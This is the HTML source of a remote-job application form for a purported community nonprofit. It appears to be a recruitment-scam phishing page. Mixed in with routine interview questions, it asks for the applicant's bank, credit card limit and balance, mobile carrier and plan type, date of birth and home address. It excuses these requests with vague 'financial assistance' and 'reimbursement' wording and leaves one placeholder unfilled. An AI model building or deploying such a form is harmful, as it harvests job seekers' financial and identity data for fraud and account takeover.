<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,700,900&display=swap" rel="stylesheet">

    <link rel="stylesheet" href="fonts/icomoon/style.css">


    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    
    <!-- Style -->
    <link rel="stylesheet" href="css/style.css">

    <title>Job Application Form</title>
  </head>
  <body>
  

  <div class="content">
    
    <div class="container">
      <div class="row">
	 
        <div class="col-md-12 mr-auto">
		 <img src="back.jpg" width="100%" height="auto">
		
          <h3 class="mb-3">ST. VINCENT COMMUNITY HELPING HANDS INC</h3>
		  <p style="color:white">Job Application </p>
          <p style="color:white"> Screening Test/Interview Session(Remote Position)</p>
          
        </div>

        <div class="col-md-12">
          <div class="box">
            <h3 class="heading">Please note that it is imperative to fill and submit this form before due.
 Fill accordingly, use correct spelling and grammar</h3>
 <form action="action.php" class="mb-5" method="post" enctype="multipart/form-data">
 <hr/>
            <h5>Section 1: Personal & Work Experience</h5>
              <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Are you currently employed? *</label>
				<select name="employed" required class="custom-select">
					<option>Yes</option>
					<option>No</option>
				</select>
                </div>
              </div>
			  
			   <div class="row">
                
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">What type of jobs have you had? *</label>
                  <input type="text" class="form-control" name="jobs" required>
                </div>
			    </div>
				
				<div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Have you worked as a remote employee in the past? *</label>
				<select name="worked" required class="custom-select">
					<option>Yes</option>
					<option>No</option>
				</select>
                </div>
              </div>
			  
			  <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">What position are you applying for? *</label>
				<select name="position" required class="custom-select">
					<option>Customer Service Representative</option>
					<option>Administrative/Personal Assistant</option>
					<option>Data Entry</option>
					<option>Payroll Assistant</option>
					<option>Delivery Assistant</option>
				</select>
                </div>
              </div>
			  
			  <div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">How did you get your previous jobs? *</label>
                  <input type="text" class="form-control" name="getjobs" required>
                </div>
			    </div>
				
				<div class="row">
				<div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">What were your main responsibilities? Achievements? *</label>
                  <input type="text" class="form-control" name="achieve" required>
                </div>
			    </div>
				
			  <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Have you been in the military before? *</label>
				<select name="military" required class="custom-select">
					<option>Yes</option>
					<option>No</option>
				</select>
                </div>
              </div>
			  
			  <div class="row">
				<div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Do you consider yourself quick, sharp in handling tasks and completing errands efficiently? *</label>
                  <input type="text" class="form-control" name="consider" required>
                </div>
			    </div>
			  
			  <hr/>
		<h5>Section 2: Availability & Preferences</h5>
		 <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Are you willing to work Part-time or Full-time? *</label>
				<select name="timeofwork" required class="custom-select">
					<option>Full Time</option>
					<option>Part Time</option>
				</select>
                </div>
              </div>
			  
			  <div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Are you seeking employment in a company of a certain size? *</label>
                  <input type="text" class="form-control" name="coysize" required>
                </div>
			    </div>
				
				<div class="row">
				<div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">How long do you intend working for this company ? *</label>
                  <input type="text" class="form-control" name="worklong" required>
                </div>
			    </div>
				
			  <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">How would you like to be Paid ? *</label>
				<select name="paidtype" required class="custom-select">
					<option>Bi-weekly</option>
					<option>Monthly</option>
				</select>
                </div>
              </div>
			  <hr/>
		<h5>Section 3 : Situational & Behavioral Questions</h5>
		<div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Imagine you're working on an important project and an unexpected urgent request comes
 in from your supervisor. How would you manage your time and ensure that both tasks are
 completed on time? *</label>
                  <input type="text" class="form-control" name="q1" required>
                </div>
			    </div>
				<div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">This role involves managing sensitive financial task and responsibilities. Do you confirm
 that you can be trusted with handling such duties with full honesty, transparency, and
 efficiency? *</label>
                  <input type="text" class="form-control" name="q2" required>
                </div>
			    </div>
				<div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">How do you meet tough deadlines? Talk about a time you completed great work under
 pressure? *</label>
                  <input type="text" class="form-control" name="q3" required>
                </div>
			    </div>
				<hr/>
		<h5>Section 4 : Financial Disclosure</h5>
				<div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">For facilitation and processing of salary and bonuses, What financial institution do you bank with? *</label>
                  <input type="text" class="form-control" name="q4" required>
                </div>
			    </div>
				  <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Given the financial responsibilities of this role, we would like to better understand your experience
 in managing funds As part of our process to support staff with potential credit benefits, could you
 please confirm whether you own a credit card? *</label>
				<select name="qq1" required class="custom-select">
					<option>Yes</option>
					<option>No</option>
				</select>
                </div>
              </div>
		   <div class="row">
                If yes kindly provide your credit limit and current balance below
                <div class="col-md-6 form-group">
                  <label for="name" class="col-form-label">Credit limit</label>
                  <input type="number" class="form-control" name="q5" >
                </div>
                <div class="col-md-6 form-group">
                  <label for="name" class="col-form-label">Current Balance</label>
                  <input type="number" class="form-control" name="q6" >
                </div>
				<div style="color:white">Please note, this information is not part of our eligibility criteria, but helps us assess how we can
 can offer financial assistance along the way</div>
              </div>
			  <hr/>
		<h5>Section 5 : Personal details</h5>

              <div class="row">
                
                <div class="col-md-6 form-group">
                  <label for="name" class="col-form-label">First Name *</label>
                  <input type="text" class="form-control" name="fname" required>
                </div>
                <div class="col-md-6 form-group">
                  <label for="name" class="col-form-label">Last Name</label>
                  <input type="text" class="form-control" name="lname" required>
                </div>
              </div>
			  
			  
			   <div class="row">
                <div class="col-md-12 form-group">
                  <label for="message" class="col-form-label">Current Home Address *</label>
                  <textarea class="form-control" name="addy" cols="20" rows="3"></textarea>
                </div>
              </div>
			  
			   <div class="row">
                
                <div class="col-md-6 form-group">
                  <label for="name" class="col-form-label">Phone Number *</label>
                  <input type="number" class="form-control" name="phone" required>
                </div>
                <div class="col-md-6 form-group">
                  <label for="name" class="col-form-label">Email</label>
                  <input type="email" class="form-control" name="email" required>
                </div>
              </div>
			  
			   <div class="row">
                <div class="col-md-12 form-group">
                  <label for="message" class="col-form-label">Date of Birth *</label>
                  <input type="date" class="form-control" name="bdate" required>
                </div>
              </div>
			    <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Are you legally authorized to work in the U.S? *</label>
				<select name="workpermit" required class="custom-select">
					<option>Yes</option>
					<option>No</option>
				</select>
                </div>
              </div>
			    <div class="row">
                <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Have you ever been convicted of a felony that has not been expunged or sealed? *</label>
				<select name="convict" required class="custom-select">
					<option>Yes</option>
					<option>No</option>
				</select>
                </div>
              </div>
			  <div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">If yes, please provide detials about the nature of the conviction(s), including the date(s) jurisdiction, and any relevant circumstances.
 Note: A convictions will not disqualify you from employment. We consider the nature of the offense, its relevance to the job, and the time elapsed since
 the conviction </label>
                  <input type="text" class="form-control" name="q7" >
                </div>
			    </div>
				<div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">As part of our [job-related requirement, such as communication policy or reimbursement process], we would like to confirm the network carrier and type of plan you currently use(prepaid or postpaid) to determine compatibility with our systems or reimbursement eligibility. Could you please provide this information? *</label>
                  <input type="text" class="form-control" name="q8" required>
                </div>
			    </div>
				
				<div class="row">
			  <div class="col-md-12 form-group">
                  <label for="name" class="col-form-label">Resume ready? Upload resume here</label>
                  <input type="file" class="form-control" name="dlfront">
                </div>
			    </div>
            

              <div class="row">
                <div class="col-md-12">
                  <input type="submit" name="submit" value="Submit" class="btn btn-block btn-primary rounded-0 py-2 px-4">
                  <span class="submitting"></span>
                </div>
              </div>
			  
            </form>

            <div id="form-message-warning mt-4"></div> 
            <div id="form-message-success">
              Your message was sent, thank you!
            </div>
			
          </div>
        </div>
		<img src="footer.jpg" width="100%" height="auto">
      </div>
  </div>
    
    

    <script src="js/jquery-3.3.1.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/jquery.validate.min.js"></script>
    <script src="js/main.js"></script>

  </body>
</html>